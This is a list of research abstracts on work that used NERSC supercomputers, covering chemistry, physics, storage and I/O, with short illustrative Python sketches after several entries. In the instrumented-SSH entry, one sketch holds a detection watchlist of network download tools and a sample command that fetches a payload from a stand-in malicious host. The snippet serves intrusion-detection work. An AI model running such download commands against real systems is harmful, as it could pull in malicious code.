So, what's the future going to look like for us? The office is putting together an initiative with the community, which we call the E3 Initiative. We're looking at a 10-year horizon for what's going to happen. Through the series of town hall meetings, which many of you participated in, we have produced a document on `Transforming Energy, the Environment and Science through simulations at the eXtreme Scale'; it can be found at http://www.science.doe.gov/ascr/ProgramDocuments/TownHall.pdf. We sometimes call it the Exascale initiative. Exascale computing is the gold-ring level of computing that seems just out of reach; but if we work hard and stretch, we just might be able to reach it. We envision that there will be a SciDAC-X, working at the extreme scale, with SciDAC teams that will perform and carry out science in the areas that will have a great societal impact, such as alternative fuels and transportation, combustion, climate, fusion science, high-energy physics, advanced fuel cycles, carbon management, and groundwater.
We envision institutes for applied mathematics and computer science that probably will segue into algorithms because, at the extreme scale, we see the applied mathematics of an algorithm and its implementation in computer science as inseparable. We envision an INCITE-X with multi-petaflop platforms, perhaps even exaflop computing resources. ESnet will be best in class - our 10-year plan calls for having 400 terabits per second of capacity available in dual rings around the country, an enormously fast data communications network for moving large amounts of data. In looking at where we've been and where we are going, we can see that the gigaflops and teraflops era was a regime where we were following Moore's law through advances in clock speed. In the current regime, we're introducing massive parallelism, which I think is exemplified by Intel's announcement of their teraflop chip, where they envision more than a thousand cores on a chip. But in order to reach exascale, extrapolations talk about machines that would require 100 megawatts of power with current architectures. It's clearly going to require novel architectures, things we have perhaps not yet envisioned. It is of course an era of challenge. There will be an unpredictable evolution of hardware if we are to reach the exascale; and there will clearly be multilevel heterogeneous parallelism, including multilevel memory hierarchies. We have no idea right now as to the programming models needed to execute at such an extreme scale. We have been incredibly successful at the petascale - we know that already. Managing data and just getting communications to scale is an enormous challenge. And it's not just the extreme scaling. It's the rapid increase in complexity that represents the challenge. Let me end with a metaphor. In previous meetings we have talked about the road to petascale. Indeed, we have seen in hindsight that it was a road well traveled.
But perhaps the road to exascale is not a road at all. Perhaps the metaphor will be akin to scaling the south face of K2. That's clearly not something all of us will be able to do, and probably computing at the exascale is not something all of us will do. But if we achieve that goal, perhaps the words of Emily Dickinson will best summarize where we will be. Perhaps in her words, looking backward and down, you will say: I climb the `Hill of Science' I view the landscape o'er; Such transcendental prospect I ne'er beheld before!

  10. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Jing Yanfei, E-mail: yanfeijing@uestc.edu.c; Huang Tingzhu, E-mail: tzhuang@uestc.edu.c; Duan Yong, E-mail: duanyong@yahoo.c

This study focuses on iterative solutions, with simple diagonal preconditioning, of two complex-valued nonsymmetric systems of linear equations arising from a computational chemistry model problem proposed by Sherry Li of NERSC. Numerical experiments show the feasibility of iterative methods for these problems and reveal the competitiveness of our recently proposed Lanczos biconjugate A-orthonormalization methods relative to other classic and popular iterative methods. The experiments also indicate that application-specific preconditioners may be required to accelerate convergence.
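As a sketch of what "simple diagonal preconditioning" means in practice, the toy example below applies a Jacobi (diagonal) preconditioner to a small, randomly generated complex nonsymmetric system and solves it with a plain fixed-point iteration. The matrix is illustrative only (not the computational-chemistry matrices from the paper), and the Richardson loop stands in for the more sophisticated Lanczos-type solvers discussed there.

```python
import numpy as np

# Illustrative complex nonsymmetric system: strong complex diagonal
# plus a small dense perturbation. NOT the paper's actual matrices.
rng = np.random.default_rng(0)
n = 50
diag = rng.uniform(5.0, 10.0, n) + 1j * rng.uniform(5.0, 10.0, n)
A = np.diag(diag) + 0.05 * (rng.standard_normal((n, n))
                            + 1j * rng.standard_normal((n, n)))
b = rng.standard_normal(n) + 1j * rng.standard_normal(n)

# Jacobi (diagonal) preconditioning: scale each row by 1/a_ii, which
# clusters the eigenvalues of the preconditioned operator around 1.
D_inv = 1.0 / np.diag(A)
A_p = D_inv[:, None] * A
b_p = D_inv * b

# Richardson iteration x <- x + (b' - A'x) on the preconditioned
# system; it converges here because the off-diagonal part of A' is
# small relative to its unit diagonal.
x = np.zeros(n, dtype=complex)
for _ in range(200):
    x += b_p - A_p @ x

residual = np.linalg.norm(b - A @ x) / np.linalg.norm(b)
```

The same diagonal scaling can be handed to a Krylov solver as a preconditioner; the point is only that dividing by the diagonal is cheap and already tames a diagonally dominant system.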

  11. Double photoionization of Be-like (Be-F5+) ions

    NASA Astrophysics Data System (ADS)

    Abdel Naby, Shahin; Pindzola, Michael; Colgan, James

    2015-04-01

    The time-dependent close-coupling method is used to study the single photon double ionization of Be-like (Be - F5+) ions. Energy and angle differential cross sections are calculated to fully investigate the correlated motion of the two photoelectrons. Symmetric and antisymmetric amplitudes are presented along the isoelectronic sequence for different energy sharing of the emitted electrons. Our total double photoionization cross sections are in good agreement with available theoretical results and experimental measurements along the Be-like ions. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California and the National Institute for Computational Sciences in Knoxville, Tennessee.

  12. Toward Exascale Earthquake Ground Motion Simulations for Near-Fault Engineering Analysis

    DOE PAGES

    Johansen, Hans; Rodgers, Arthur; Petersson, N. Anders; ...

    2017-09-01

Modernizing SW4 for massively parallel time-domain simulations of earthquake ground motions in 3D earth models increases resolution and provides ground motion estimates for critical infrastructure risk evaluations. Simulations of ground motions from large (M ≥ 7.0) earthquakes require domains on the order of 100 to 500 km and spatial granularity on the order of 1 to 5 m, resulting in hundreds of billions of grid points. Surface-focused structured mesh refinement (SMR) allows for a more constant number of grid points per wavelength in typical Earth models, where wavespeeds increase with depth. In fact, SMR allows simulations to double the frequency content relative to a fixed-grid calculation on a given resource. The authors report improvements to the SW4 algorithm developed while porting the code to the Cori Phase 2 (Intel Xeon Phi) system at the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Investigations of the performance of the innermost loop of the calculations found that reorganizing the order of operations can improve performance for massive problems.
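The grid-count argument can be illustrated with back-of-envelope arithmetic: a uniform grid must use the fine spacing dictated by the slow near-surface wavespeeds everywhere, while mesh refinement coarsens with depth as wavespeeds rise. The layer thicknesses and spacings below are invented for illustration; they are not SW4's actual configurations.

```python
# Back-of-envelope grid-point counts for a regional ground-motion run
# (illustrative values only).
def grid_points_uniform(domain_km, depth_km, h_m):
    """Uniform grid sized by the slowest (near-surface) wavespeed."""
    nx = domain_km * 1000.0 / h_m
    nz = depth_km * 1000.0 / h_m
    return nx * nx * nz

def grid_points_refined(domain_km, layers):
    """Mesh refinement: each (thickness_km, h_m) layer uses its own
    spacing, keeping points-per-wavelength roughly constant as
    wavespeed grows with depth."""
    total = 0.0
    for thickness_km, h_m in layers:
        nx = domain_km * 1000.0 / h_m
        nz = thickness_km * 1000.0 / h_m
        total += nx * nx * nz
    return total

uniform = grid_points_uniform(100, 30, 5.0)   # 5 m spacing everywhere
refined = grid_points_refined(100, [(1, 5.0), (4, 10.0), (25, 20.0)])
ratio = uniform / refined                     # savings from refinement
```

With these made-up layers the refined mesh needs roughly an order of magnitude fewer points, which is the headroom that lets a refined run double its frequency content on the same resource.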


  14. Dehydration of 1-octadecanol over H-BEA: A combined experimental and computational study

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Song, Wenji; Liu, Yuanshuai; Barath, Eszter

Liquid-phase dehydration of 1-octadecanol, which is formed as an intermediate during the hydrodeoxygenation of microalgae oil, has been explored in a combined experimental and computational study. The alkyl chain of the C18 alcohol interacts with acid sites during diffusion inside the zeolite pores, resulting in inefficient utilization of the Brønsted acid sites for samples with high acid site concentrations. The parallel intra- and intermolecular dehydration pathways have different activation energies and pass through alternative reaction intermediates. Formation of surface-bound alkoxide species is the rate-limiting step during intramolecular dehydration, whereas intermolecular dehydration proceeds via a bulky dimer intermediate. Octadecene is the primary dehydration product over H-BEA at 533 K. Although Brønsted acid sites make the main contribution to both dehydration pathways, Lewis acid sites are also active in the formation of dioctadecyl ether. The intramolecular dehydration to octadecene and cleavage of the intermediately formed ether, however, require strong BAS. L. Wang, D. Mei and J. A. Lercher acknowledge the partial support from the US Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC). EMSL is a national scientific user facility located at Pacific Northwest National Laboratory (PNNL) and sponsored by DOE's Office of Biological and Environmental Research.

  15. Ab initio molecular dynamics simulations for the role of hydrogen in catalytic reactions of furfural on Pd(111)

    NASA Astrophysics Data System (ADS)

    Xue, Wenhua; Dang, Hongli; Liu, Yingdi; Jentoft, Friederike; Resasco, Daniel; Wang, Sanwu

    2014-03-01

In the study of catalytic reactions of biomass, furfural conversion over metal catalysts in the presence of hydrogen has attracted wide attention. We report ab initio molecular dynamics simulations for furfural and hydrogen on the Pd(111) surface at finite temperatures. The simulations demonstrate that the presence of hydrogen is important in promoting furfural conversion. In particular, hydrogen molecules dissociate rapidly on the Pd(111) surface. As a result of such dissociation, atomic hydrogen participates in the reactions with furfural. The simulations also provide detailed information about the possible reactions of hydrogen with furfural. Supported by DOE (DE-SC0004600). This research used the supercomputer resources of the XSEDE, the NERSC Center, and the Tandy Supercomputing Center.

  16. First-principles quantum-mechanical investigations of biomass conversion at the liquid-solid interfaces

    NASA Astrophysics Data System (ADS)

    Dang, Hongli; Xue, Wenhua; Liu, Yingdi; Jentoft, Friederike; Resasco, Daniel; Wang, Sanwu

    2014-03-01

    We report first-principles density-functional calculations and ab initio molecular dynamics (MD) simulations for the reactions involving furfural, which is an important intermediate in biomass conversion, at the catalytic liquid-solid interfaces. The different dynamic processes of furfural at the water-Cu(111) and water-Pd(111) interfaces suggest different catalytic reaction mechanisms for the conversion of furfural. Simulations for the dynamic processes with and without hydrogen demonstrate the importance of the liquid-solid interface as well as the presence of hydrogen in possible catalytic reactions including hydrogenation and decarbonylation of furfural. Supported by DOE (DE-SC0004600). This research used the supercomputer resources of the XSEDE, the NERSC Center, and the Tandy Supercomputing Center.

  17. 2009 ALCF annual report.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Beckman, P.; Martin, D.; Drugan, C.

    2010-11-23

This year the Argonne Leadership Computing Facility (ALCF) delivered nearly 900 million core-hours of science. The research conducted at this leadership-class facility touched our lives in both minute and massive ways - whether it was studying the catalytic properties of gold nanoparticles, predicting protein structures, or unearthing the secrets of exploding stars. The authors remained true to their vision of acting as a forefront computational center that extends science frontiers by solving pressing problems for the nation. This success was due mainly to the Department of Energy's (DOE) INCITE (Innovative and Novel Computational Impact on Theory and Experiment) program. The program awards significant amounts of computing time to computationally intensive, unclassified research projects that can make high-impact scientific advances. This year, DOE allocated 400 million hours of time to 28 research projects at the ALCF. Scientists from around the world conducted the research, representing such esteemed institutions as the Princeton Plasma Physics Laboratory, the National Institute of Standards and Technology, and the European Center for Research and Advanced Training in Scientific Computation. Argonne also provided Director's Discretionary allocations for research challenges, addressing such issues as reducing aerodynamic noise, critical for next-generation 'green' energy systems. Intrepid - the ALCF's 557-teraflops IBM Blue Gene/P supercomputer - enabled astounding scientific solutions and discoveries. Intrepid went into full production five months ahead of schedule. As a result, the ALCF nearly doubled the days of production computing available to the DOE Office of Science, INCITE awardees, and Argonne projects. One of the fastest supercomputers in the world for open science, the energy-efficient system uses about one-third as much electricity as a machine of comparable size built with more conventional parts.
In October 2009, President Barack Obama recognized the excellence of the entire Blue Gene series by awarding it the National Medal of Technology and Innovation. Other noteworthy achievements included the ALCF's collaboration with the National Energy Research Scientific Computing Center (NERSC) to examine cloud computing as a potential new computing paradigm for scientists. Named Magellan, the DOE-funded initiative will explore which science application programming models work well within the cloud, as well as evaluate the challenges that come with this new paradigm. The ALCF also obtained approval for its next-generation machine, a 10-petaflops system to be delivered in 2012. This system will make it possible to resolve ever more pressing problems, even more expeditiously, through breakthrough science in the years to come.

  18. First-Principles Thermodynamics Study of Spinel MgAl 2 O 4 Surface Stability

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Cai, Qiuxia; Wang, Jian-guo; Wang, Yong

The surface stability of all possible terminations of the three low-index (111, 110, 100) structures of spinel MgAl2O4 has been studied using a first-principles-based thermodynamic approach. The surface Gibbs free energy results indicate that the 100_AlO2 termination is the most stable surface structure under ultra-high vacuum at T = 1100 K in both Al-poor and Al-rich environments. With increasing oxygen pressure, the 111_O2(Al) termination becomes the most stable surface in the Al-rich environment. Oxygen vacancy formation is thermodynamically favorable over the 100_AlO2 and 111_O2(Al) terminations and the (111) structure with Mg/O-connected terminations. On the basis of surface Gibbs free energies for both perfect and defective surface terminations, the 100_AlO2 and 111_O2(Al) are the dominant surfaces in the Al-rich environment under atmospheric conditions. This is also consistent with our previously reported experimental observations. This work was supported by a Laboratory Directed Research and Development (LDRD) project of the Pacific Northwest National Laboratory (PNNL). The computing time was granted by the National Energy Research Scientific Computing Center (NERSC). Part of the computing time was also granted by a scientific theme user proposal in the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL), which is a U.S. Department of Energy national scientific user facility located at PNNL in Richland, Washington.

  19. Computational Investigations of Rovibrational Quenching of HD due to Collisions in the Interstellar Medium

    NASA Astrophysics Data System (ADS)

    Goodman Veazey, Clark; Wan, Yier; Yang, Benhui H.; Stancil, P.

    2017-06-01

When examining distant astronomical objects, scientists rely on measurements derived from astronomical observations, which are primarily collected using spectroscopy. Interpreting spectroscopic data requires a background of accurate dynamical information on interstellar molecules. Because most of the observable infrared radiation in the universe is emitted by molecules excited by collisional processes in the interstellar gas, generating accurate data on the rates of molecular collisions is of salient interest to astronomy. The collisional system we focus on here is He-HD, an atom-diatom system in which He collides with HD. We are primarily interested in the cooling capabilities of this system, as these species are predicted to have played an important role in the formation of primordial stars, which emerged from a background composed solely of hydrogen, helium, and their compounds. HD is being investigated because it has a finite dipole moment and is hence a powerful radiator, and He because of its relative abundance in the early universe. Using a hybrid OpenMP/MPI adaptation (vrrm) of a public-domain scattering package, cross sections for He-HD collisions are computed for a swath of both rotational and vibrational states across a range of relevant kinetic energies, then integrated to produce rate coefficients. The vast computational requirements of these operations necessitate the use of high-powered computational resources. The work of CV was funded by a UGA Center for Undergraduate Research Opportunities award. We thank the University of Georgia GACRC and NERSC at Lawrence Berkeley for computational resources and Brendan McLaughlin for assistance.
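The final step mentioned above, integrating cross sections into rate coefficients, is a thermal average over a Maxwell-Boltzmann distribution: k(T) = sqrt(8/(pi mu)) (kT)^(-3/2) integral of sigma(E) E exp(-E/kT) dE. The sketch below implements that quadrature in plain Python and checks it against the constant-cross-section limit; the reduced mass and cross-section values are illustrative placeholders, not He-HD results from this work.

```python
import math

def rate_coefficient(sigma, mu, T, n=20000, emax_kT=30.0):
    """Thermally average a cross section sigma(E) [m^2] over a
    Maxwell-Boltzmann distribution to get k(T) = <sigma v> [m^3/s].
    mu: reduced mass [kg]; T: temperature [K]; simple Riemann sum."""
    kB = 1.380649e-23
    kT = kB * T
    dE = emax_kT * kT / n
    integral = sum(sigma(i * dE) * (i * dE) * math.exp(-i * dE / kT) * dE
                   for i in range(1, n + 1))
    return math.sqrt(8.0 / (math.pi * mu)) * kT ** -1.5 * integral

# Sanity check with a constant cross section, where the thermal average
# reduces to sigma times the mean relative speed sqrt(8 kT / (pi mu)).
mu = 1.2e-27       # illustrative reduced mass in kg (not a fitted value)
sigma0 = 1e-20     # 1 Angstrom^2 expressed in m^2
k = rate_coefficient(lambda E: sigma0, mu, 100.0)
```

In a real application sigma(E) would be the tabulated state-to-state cross section, interpolated in energy, and k(T) would be evaluated on the temperature grid relevant to the astrophysical model.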

  20. Visualizing staggered fields and analyzing electromagnetic data with PerceptEM

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shasharina, Svetlana

This project resulted in VSimSP, software for simulating large photonic devices on high-performance computers. It includes: a GUI for photonics simulations; a high-performance meshing algorithm; a 2nd-order multimaterials algorithm; a mode solver for waveguides; a 2nd-order material dispersion algorithm; S-parameter calculation; a high-performance workflow at NERSC; and simulation setups for large photonic devices. We believe we became the only company in the world that can simulate large photonic devices in 3D on modern supercomputers without the need to split them into subparts or do low-fidelity modeling. We have started a commercial engagement with a manufacturing company.

  1. Investigation of energetic particle induced geodesic acoustic mode

    NASA Astrophysics Data System (ADS)

    Schneller, Mirjam; Fu, Guoyong; Chavdarovski, Ilija; Wang, Weixing; Lauber, Philipp; Lu, Zhixin

    2017-10-01

Energetic particles are ubiquitous in present and future tokamaks due to heating systems and fusion reactions. Anisotropy in the distribution function of the energetic particle population is able to excite oscillations from the continuous spectrum of geodesic acoustic modes (GAMs), which cannot be driven by plasma pressure gradients due to their toroidally and nearly poloidally symmetric structures. These oscillations are known as energetic particle-induced geodesic acoustic modes (EGAMs) [G.Y. Fu'08] and have been observed in recent experiments [R. Nazikian'08]. EGAMs are particularly attractive in the framework of turbulence regulation, since they lead to an oscillatory radial electric field shear which can potentially saturate the turbulence. For the presented work, the nonlinear gyrokinetic, electrostatic, particle-in-cell code GTS [W.X. Wang'06] has been extended to include an energetic particle population following either a bump-on-tail Maxwellian or a slowing-down [Stix'76] distribution function. With this new tool, we study the growth rate, frequency, and mode structure of the EGAM in an ASDEX Upgrade-like scenario. A detailed understanding of EGAM excitation proves essential for future studies of EGAM interaction with micro-turbulence. Funded by the Max Planck Princeton Research Center. Computational resources of MPCDF and NERSC are gratefully acknowledged.
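For reference, the slowing-down distribution cited above has the classic Stix form f(v) proportional to 1/(v^3 + v_c^3) up to the birth speed v_b, where v_c is the critical speed at which electron and ion drag balance. The sketch below evaluates and normalizes it numerically; speeds are in arbitrary units and the parameter values are illustrative, not those of the ASDEX Upgrade-like scenario.

```python
import math

def slowing_down(v, v_birth, v_crit, C=1.0):
    """Isotropic slowing-down distribution (Stix 1976 form):
    f(v) = C / (v^3 + v_crit^3) for v <= v_birth, zero above."""
    if v > v_birth:
        return 0.0
    return C / (v ** 3 + v_crit ** 3)

# Normalize so that int 4*pi*v^2 f(v) dv = 1 (unit fast-ion density).
# Analytically this integral is (4*pi/3) * ln(1 + (v_b/v_c)^3) / C^-1.
v_b, v_c, n = 1.0, 0.5, 10000
dv = v_b / n
norm = sum(4 * math.pi * (i * dv) ** 2 * slowing_down(i * dv, v_b, v_c) * dv
           for i in range(1, n + 1))
f_mid = slowing_down(0.3 * v_b, v_b, v_c, C=1.0 / norm)
```

A bump-on-tail Maxwellian would simply swap the functional form; in a particle-in-cell code either distribution is sampled when the fast-ion markers are loaded.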

  2. National Storage Laboratory: a collaborative research project

    NASA Astrophysics Data System (ADS)

    Coyne, Robert A.; Hulen, Harry; Watson, Richard W.

    1993-01-01

    The grand challenges of science and industry that are driving computing and communications have created corresponding challenges in information storage and retrieval. An industry-led collaborative project has been organized to investigate technology for storage systems that will be the future repositories of national information assets. Industry participants are IBM Federal Systems Company, Ampex Recording Systems Corporation, General Atomics DISCOS Division, IBM ADSTAR, Maximum Strategy Corporation, Network Systems Corporation, and Zitel Corporation. Industry members of the collaborative project are funding their own participation. Lawrence Livermore National Laboratory through its National Energy Research Supercomputer Center (NERSC) will participate in the project as the operational site and provider of applications. The expected result is the creation of a National Storage Laboratory to serve as a prototype and demonstration facility. It is expected that this prototype will represent a significant advance in the technology for distributed storage systems capable of handling gigabyte-class files at gigabit-per-second data rates. Specifically, the collaboration expects to make significant advances in hardware, software, and systems technology in four areas of need, (1) network-attached high performance storage; (2) multiple, dynamic, distributed storage hierarchies; (3) layered access to storage system services; and (4) storage system management.

  3. Nuclear-Recoil Differential Cross Sections for the Two Photon Double Ionization of Helium

    NASA Astrophysics Data System (ADS)

    Abdel Naby, Shahin; Ciappina, M. F.; Lee, T. G.; Pindzola, M. S.; Colgan, J.

    2013-05-01

In support of the reaction microscope measurements at the free-electron laser facility in Hamburg (FLASH), we use the time-dependent close-coupling (TDCC) method to calculate fully differential nuclear-recoil cross sections for the two-photon double ionization of He at a photon energy of 44 eV. The total cross section for the double ionization is in good agreement with previous calculations. The nuclear-recoil distribution is in good agreement with the experimental measurements. In contrast to single-photon double ionization, the maximum nuclear-recoil triple differential cross section is obtained at small nuclear momenta. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California and the National Institute for Computational Sciences in Knoxville, Tennessee.

  4. Tuning HDF5 subfiling performance on parallel file systems

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Byna, Suren; Chaarawi, Mohamad; Koziol, Quincey

Subfiling is a technique used on parallel file systems to reduce locking and contention issues when multiple compute nodes interact with the same storage target node. Subfiling provides a compromise between the single-shared-file approach, which instigates lock contention problems on parallel file systems, and the one-file-per-process approach, which generates a massive and unmanageable number of files. In this paper, we evaluate and tune the performance of the recently implemented subfiling feature in HDF5. Specifically, we explain the implementation strategy of the subfiling feature in HDF5, provide examples of using the feature, and evaluate and tune parallel I/O performance of this feature with the parallel file systems of the Cray XC40 system at NERSC (Cori), which include a burst buffer storage and a Lustre disk-based storage. We also evaluate I/O performance on the Cray XC30 system, Edison, at NERSC. Our results show a 1.2X to 6X performance advantage with subfiling compared to writing a single shared HDF5 file. We present our exploration of configurations, such as the number of subfiles and the number of Lustre storage targets for storing files, as optimization parameters to obtain superior I/O performance. Based on this exploration, we discuss recommendations for achieving good I/O performance as well as limitations of the subfiling feature.
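Conceptually, subfiling is just a rank-to-subfile grouping; the sketch below shows the arithmetic of that middle ground. This is not the HDF5 subfiling API (the function name is hypothetical), only the mapping it would maintain internally.

```python
def assign_subfiles(n_ranks, n_subfiles):
    """Map each writer rank to (subfile index, slot within that subfile).
    Ranks are grouped contiguously, so lock contention is limited to the
    ranks that share a subfile instead of spanning all ranks."""
    per_file = -(-n_ranks // n_subfiles)  # ceil(n_ranks / n_subfiles)
    return {rank: (rank // per_file, rank % per_file)
            for rank in range(n_ranks)}

# 1024 writer ranks funneled into 32 subfiles: 32 writers per file,
# rather than 1024 ranks contending for one shared file (lock storms)
# or 1024 separate files (unmanageable file counts).
mapping = assign_subfiles(1024, 32)
files_used = len({f for f, _ in mapping.values()})
```

The tuning knobs studied in the paper (number of subfiles, number of Lustre storage targets) amount to choosing `n_subfiles` and where each subfile is placed.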

  5. First-principles characterization of formate and carboxyl adsorption on the stoichiometric CeO2(111) and CeO2(110) surfaces

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Mei, Donghai

    2013-05-20

Molecular adsorption of formate and carboxyl on the stoichiometric CeO2(111) and CeO2(110) surfaces was studied using periodic density functional theory (DFT+U) calculations. Two distinguishable adsorption modes (strong and weak) of formate are identified. The bidentate configuration is more stable than the monodentate adsorption configuration. Both formate and carboxyl bind more strongly at the more open CeO2(110) surface. The calculated vibrational frequencies of the two adsorbed species are consistent with experimental measurements. Finally, the effects of the U parameter on the adsorption of formate and carboxyl over both CeO2 surfaces were investigated. We found that the geometrical configurations of the two adsorbed species are not affected by using different U parameters (U = 0, 5, and 7). However, the calculated adsorption energy of carboxyl increases pronouncedly with the U value, while the adsorption energy of formate changes only slightly (<0.2 eV). The Bader charge analysis shows that opposite charge transfer occurs for formate and carboxyl adsorption: the adsorbed formate is negatively charged while the adsorbed carboxyl is positively charged. Interestingly, with increasing U parameter, the amount of charge transferred also increases. This work was supported by the Laboratory Directed Research and Development (LDRD) project of the Pacific Northwest National Laboratory (PNNL) and by a Cooperative Research and Development Agreement (CRADA) with General Motors. The computations were performed using the Molecular Science Computing Facility in the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL), which is a U.S. Department of Energy national scientific user facility located at PNNL in Richland, Washington. Part of the computing time was also granted by the National Energy Research Scientific Computing Center (NERSC).
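For readers unfamiliar with the convention, adsorption energies in such DFT studies are differences of total energies. The sketch below shows the bookkeeping with invented numbers (not the paper's DFT+U values); a more negative value means stronger binding, as in the stronger binding reported on CeO2(110).

```python
def adsorption_energy(e_total, e_surface, e_molecule):
    """E_ads = E(slab + adsorbate) - E(slab) - E(adsorbate), in eV.
    More negative means stronger binding."""
    return e_total - e_surface - e_molecule

# Illustrative total energies in eV; these are placeholders, not the
# paper's computed values.
e_ads_110 = adsorption_energy(-1052.7, -1050.0, -0.5)  # -2.2 eV
e_ads_111 = adsorption_energy(-1051.9, -1050.0, -0.5)  # -1.4 eV
stronger = "CeO2(110)" if e_ads_110 < e_ads_111 else "CeO2(111)"
```

The U-dependence discussed in the abstract enters through e_total and e_surface: recomputing both with a different Hubbard U shifts the difference for carboxyl much more than for formate.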

  6. Instrumented SSH

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Campbell, Scott

    NERSC recently undertook a project to access and analyze Secure Shell (SSH) related data. This includes authentication data such as user names and key fingerprints, interactive session data such as keystrokes and responses, and information about noninteractive sessions such as commands executed and files transferred. Historically, this data has been inaccessible with traditional network monitoring techniques, but with a modification to the SSH daemon, this data can be passed directly to intrusion detection systems for analysis. The instrumented version of SSH is now running on all NERSC production systems. This paper describes the project, details about how SSH was instrumented, and the initial results of putting this in production.
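
    The pipeline described above, session data emitted by a modified sshd and consumed by an intrusion detection system, can be sketched as a stream of audit records matched against a watchlist. The record format here (timestamp, session id, event type, payload) and the watchlist are hypothetical illustrations, not the actual NERSC instrumented-SSH wire format.

```python
# Minimal sketch: consume instrumented-SSH audit records and flag sessions
# that execute watchlisted commands. The tab-separated record format is
# hypothetical, invented for illustration only.

SUSPICIOUS = {"wget", "curl", "nc"}  # toy watchlist

def parse_record(line: str) -> dict:
    ts, session, event, payload = line.rstrip("\n").split("\t", 3)
    return {"ts": float(ts), "session": session, "event": event, "payload": payload}

def alerts(lines):
    """Yield session ids whose executed commands hit the watchlist."""
    for line in lines:
        rec = parse_record(line)
        if rec["event"] == "command" and rec["payload"].split()[0] in SUSPICIOUS:
            yield rec["session"]

sample = [
    "1.0\ts1\tauth\tuser=alice key=ab:cd",
    "2.0\ts1\tcommand\twget http://malware.example/payload",
]
assert list(alerts(sample)) == ["s1"]
```

    A real deployment would of course hand these events to a full IDS rather than a set-membership check, but the data flow is the same.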

  7. Extreme I/O on HPC for HEP using the Burst Buffer at NERSC

    NASA Astrophysics Data System (ADS)

    Bhimji, Wahid; Bard, Debbie; Burleigh, Kaylan; Daley, Chris; Farrell, Steve; Fasel, Markus; Friesen, Brian; Gerhardt, Lisa; Liu, Jialin; Nugent, Peter; Paul, Dave; Porter, Jeff; Tsulaia, Vakho

    2017-10-01

    In recent years there has been increasing use of HPC facilities for HEP experiments. This has initially focussed on less I/O intensive workloads such as generator-level or detector simulation. We now demonstrate the efficient running of I/O-heavy analysis workloads on HPC facilities at NERSC, for the ATLAS and ALICE LHC collaborations as well as astronomical image analysis for DESI and BOSS. To do this we exploit a new 900 TB NVRAM-based storage system recently installed at NERSC, termed a Burst Buffer. This is a novel approach to HPC storage that builds on-demand filesystems on all-SSD hardware that is placed on the high-speed network of the new Cori supercomputer. We describe the hardware and software involved in this system, and give an overview of its capabilities, before focusing in detail on how the ATLAS, ALICE and astronomical workflows were adapted to work on this system. We describe these modifications and the resulting performance results, including comparisons to other filesystems. We demonstrate that we can meet the challenging I/O requirements of HEP experiments and scale to many thousands of cores accessing a single shared storage system.
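
    From a job's point of view, the on-demand DataWarp filesystems described above appear as a mount point whose path is exported in an environment variable (DW_JOB_STRIPED for a striped per-job allocation requested via #DW directives in the batch script). The sketch below, a hedged illustration rather than NERSC-endorsed code, resolves a fast scratch directory with sensible fallbacks.

```python
import os

# Resolve a fast scratch directory: prefer a per-job DataWarp (Burst Buffer)
# allocation if one was requested, then the site scratch filesystem, then /tmp.
# DW_JOB_STRIPED is the DataWarp convention for a striped per-job allocation;
# the fallback order here is an assumption for illustration.

def scratch_dir() -> str:
    for var in ("DW_JOB_STRIPED", "SCRATCH"):
        path = os.environ.get(var)
        if path:
            return path
    return "/tmp"
```

    Workflows can then write intermediate files under `scratch_dir()` unchanged, whether or not a Burst Buffer allocation exists.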

  8. Electronic and steric influences of pendant amine groups on the protonation of molybdenum bis (dinitrogen) complexes

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Labios, Liezel A.; Heiden, Zachariah M.; Mock, Michael T.

    2015-05-04

    The synthesis of a series of P EtP NRR' (P EtP NRR' = Et₂PCH₂CH₂P(CH₂NRR')₂, R = H, R' = Ph or 2,4-difluorophenyl; R = R' = Ph or iPr) diphosphine ligands containing mono- and disubstituted pendant amine groups, and the preparation of their corresponding molybdenum bis(dinitrogen) complexes trans-Mo(N₂)₂(PMePh₂)₂(P EtP NRR'), is described. In situ IR and multinuclear NMR spectroscopic studies monitoring the stepwise addition of triflic acid (HOTf) to trans-Mo(N₂)₂(PMePh₂)₂(P EtP NRR') complexes in THF at -40 °C show that the electronic and steric properties of the R and R' groups of the pendant amines influence whether the complexes are protonated at Mo, a pendant amine, a coordinated N₂ ligand, or a combination of these sites. For example, complexes containing mono-aryl substituted pendant amines are protonated at Mo and a pendant amine to generate mono- and dicationic Mo–H species. Protonation of the complex containing less basic diphenyl-substituted pendant amines exclusively generates a monocationic hydrazido (Mo(NNH₂)) product, indicating preferential protonation of an N₂ ligand. Addition of HOTf to the complex featuring more basic diisopropyl amines primarily produces a monocationic product protonated at a pendant amine site, as well as a trace amount of a dicationic Mo(NNH₂) product that contains protonated pendant amines. In addition, trans-Mo(N₂)₂(PMePh₂)₂(depe) (depe = Et₂PCH₂CH₂PEt₂), without a pendant amine, was synthesized and treated with HOTf, generating a monocationic Mo(NNH₂) product. Protonolysis experiments conducted on select complexes in the series afforded trace amounts of NH₄⁺. Computational analysis of the series of trans-Mo(N₂)₂(PMePh₂)₂(P EtP NRR') complexes provides further insight into the proton affinity values of the metal center, N₂ ligand, and pendant amine sites to rationalize the differing reactivity profiles.
    This research was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy, Office of Science, Office of Basic Energy Sciences. Computational resources were provided by the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Pacific Northwest National Laboratory is operated by Battelle for the U.S. Department of Energy.

